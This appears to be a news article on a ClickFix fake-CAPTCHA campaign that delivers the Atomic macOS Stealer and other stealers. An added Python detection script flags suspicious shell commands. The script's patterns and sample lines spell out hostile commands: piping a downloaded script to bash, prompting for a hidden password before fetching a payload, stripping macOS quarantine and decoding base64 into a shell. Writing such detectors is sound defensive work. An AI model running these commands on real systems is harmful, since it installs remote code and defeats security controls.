New Malware Campaign Targets macOS Users with ClickFix Exploit

By Tina Reynolds

A new campaign has been reported distributing the Atomic macOS Stealer (AMOS) to Apple macOS systems. To launch its attacks, it employs a social engineering technique known as ClickFix. The malware, created by Russian-speaking cybercriminals, fools users into unwittingly downloading the AMOS variant. This alone should sound alarm bells about how such "keyless entry", where the user hands over access, compromises the security of macOS devices.

AMOS, an information-stealing malware, uses ClickFix to lure users into executing a shell script that asks for their system password. As soon as the password has been supplied, the script retrieves the next-stage payload, which in most known cases has been AMOS. This campaign has been described as a supercharged delivery operation that uses many other sophisticated tactics to manipulate users.

“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation.” The script uses native macOS commands to extract credentials, defeat security features, and run malicious binaries.
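The behaviour described above (a pasted shell command that prompts for the user's password, fetches a next-stage payload and runs it) is something a defender can look for in shell history or endpoint command-line telemetry. The following is an added detection example, not code from the article or from any vendor named in it; the indicator patterns are generic command-line markers chosen here as assumptions, the sample lines are constructed, and the quarantine/Gatekeeper check is my reading of "defeat security features".

```python
import re

# Indicator categories drawn from the behaviour described in the article: a script
# that prompts for the password, downloads a next-stage payload and executes it.
# Patterns are generic command-line markers (assumed), not signatures from the campaign.
INDICATORS = {
    "download":        re.compile(r"\b(curl|wget)\b.*https?://"),
    "pipe_to_shell":   re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\s+['\"]\$\("),
    "password_prompt": re.compile(r"\bread\s+-s\b|\bsudo\s+-S\b|hidden answer|dscl\s+\.\s+-authonly"),
    "decode":          re.compile(r"\bbase64\s+(-d|--decode)\b"),
    "quarantine":      re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine|spctl\s+--master-disable"),
}
# Stripping the quarantine attribute or disabling Gatekeeper is rare in normal use, so it counts double.
WEIGHTS = {"quarantine": 2}
THRESHOLD = 2

def classify(cmd):
    """Return the indicator categories matched by one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def is_suspicious(cmd):
    """A single download or a single sudo is normal; combinations are what ClickFix looks like."""
    return sum(WEIGHTS.get(c, 1) for c in classify(cmd)) >= THRESHOLD

def flag_clickfix(lines):
    """Return (line, categories) for each line that crosses the threshold."""
    return [(line, classify(line)) for line in lines if is_suspicious(line)]

# Constructed sample lines (not real campaign commands); example.invalid is a reserved test domain.
SAMPLE_LINES = [
    "brew update && brew upgrade",
    "curl -O https://example.invalid/release.tar.gz",
    "curl -fsSL https://example.invalid/verify.sh | bash",
    'read -s -p "Enter your password to continue: " pw; curl -s https://example.invalid/stage2 -o /tmp/stage2',
    "xattr -d com.apple.quarantine /tmp/stage2 && chmod +x /tmp/stage2 && /tmp/stage2",
    "echo c3RhZ2Uy | base64 -d | sh",
]

if __name__ == "__main__":
    for line, cats in flag_clickfix(SAMPLE_LINES):
        print(f"SUSPICIOUS [{', '.join(cats)}]: {line}")
```

The benign `curl -O` line scores only one category and is not flagged, while the four lines that chain a download, a password prompt, a decode step or a quarantine bypass are.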

Beyond AMOS, the campaign delivers other payloads through fake Turnstile pages, including Lumma and StealC. Notably, the NetSupport RAT is also part of this distribution machine. Russian-language comments found in the malware's source code further hint at the operators' background.

The ClickFix tactic takes advantage of users' familiarity with common internet security warnings. As noted by cybersecurity experts at Darktrace, “ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses.” I really like how they stress that threat actors mostly reuse the same techniques to gain that initial access.

The campaign's approach is clever: users are shown an entirely phony CAPTCHA verification when they select the “I am human” tickbox. They are then met with an error message stating “CAPTCHA verification failed,” which encourages them to click a button for “Alternative Verification.” This manipulation exploits the conditioned responses of modern internet users, as highlighted by cybersecurity expert Daniel Kelley: “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible.”

Koushik Pal remarked on the delivery infrastructure's flaws, stating, “Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure.” Even so, the attackers' tactic for spreading their malware is effective. The weaknesses in their implementation, however, are ones that defenders can and do pounce upon to shore up their own defenses.

Cybersecurity specialists caution that these attacks can take many forms. Darktrace points out that “these include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms.” This layered approach maximizes the attackers' chances of infiltrating valuable systems.